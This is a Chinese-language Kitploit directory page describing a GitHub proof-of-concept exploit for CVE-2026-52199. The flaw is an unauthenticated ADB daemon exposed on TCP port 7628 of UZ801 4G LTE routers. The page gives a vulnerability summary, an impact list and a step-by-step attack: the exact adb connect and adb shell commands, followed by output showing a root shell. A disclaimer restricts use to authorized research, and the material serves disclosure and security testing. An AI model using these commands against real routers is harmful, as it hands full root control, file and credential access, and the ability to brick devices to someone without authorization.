Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-52199 — 针对CVE-2026-52199的概念验证利用程序:通过UZ801 4G LTE路由器上暴露的ADB守护进程实现未认证远程代码执行。包含漏洞分析、影响评估以及面向授权安全测试的分步利用指南。 | Kitploit
工具/GitHubGitHub/lamaper/cve-2026-52199
权限提升漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育远程访问工具实验室与实践
GitHublamaper/cve-2026-52199

CVE-2026-52199

针对CVE-2026-52199的概念验证利用程序:通过UZ801 4G LTE路由器上暴露的ADB守护进程实现未认证远程代码执行。包含漏洞分析、影响评估以及面向授权安全测试的分步利用指南。

查看仓库
1个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-52199:UZ801 4G 路由器中的未认证远程代码执行漏洞

漏洞摘要

Generic OEM UZ801_v2.1 4G LTE 路由器(固件 V3.4.3) 中存在一个严重的不正确的访问控制漏洞。该设备错误地将一个未认证的安卓调试桥(ADB)守护进程(/sbin/adbd)暴露在 TCP 端口 7628 上,供相邻网络(局域网/无线网络)访问。

hardware_pcb

连接到设备本地网络的攻击者可以利用此缺陷绕过所有认证机制,建立 ADB 连接,并以 root 权限执行任意代码。

evidence

受影响产品

  • 厂商: Generic OEM / 白标生态
  • 产品: UZ801_v2.1 4G LTE 路由器
  • 版本: V3.4.3
  • 易受攻击的组件: /sbin/adbd

影响

利用此漏洞可导致系统被完全攻陷。影响包括:

  • 远程代码执行(RCE): True
  • 权限提升: True(直接进入 root shell)
  • 信息泄露: True(可完全访问内部文件系统和凭据)
  • 拒绝服务(DoS): True(能够使设备变砖或遭到篡改)

概念验证(PoC)

利用过程无需特殊工具,只需标准的 adb 客户端和相邻网络访问权限。

步骤 1: 连接到 UZ801 路由器的无线网络(默认网关通常为 192.168.100.1)。

步骤 2: 扫描设备以查找开放端口。端口 7628/TCP 将显示为开放状态。

步骤 3: 在攻击者的机器上,向未记录的端口发起 ADB 连接:

root@kitploit:~
$ adb connect 192.168.100.1:7628
* daemon not running; starting now at tcp:5037
* daemon started successfully
connected to 192.168.100.1:7628

步骤 4: 请求交互式 shell:

root@kitploit:~
$ adb -s 192.168.100.1:7628 shell

步骤 5: 攻击者无需任何认证提示即可立即进入 root shell:

root@kitploit:~
root@msm8916_32_512:/ # id
uid=0(root) gid=0(root) context=u:r:su:s0
root@msm8916_32_512:/ # uname -a
Linux localhost 3.10.49 #1 SMP PREEMPT ... aarch64

免责声明

仅供教育和授权安全研究目的使用。 本仓库中提供的信息和概念验证仅用于教育目的,并帮助保护网络安全。作者(lamaper)不对任何滥用此信息的行为负责。请勿将此漏洞利用用于您不拥有或未经明确许可测试的设备或网络。

下载工具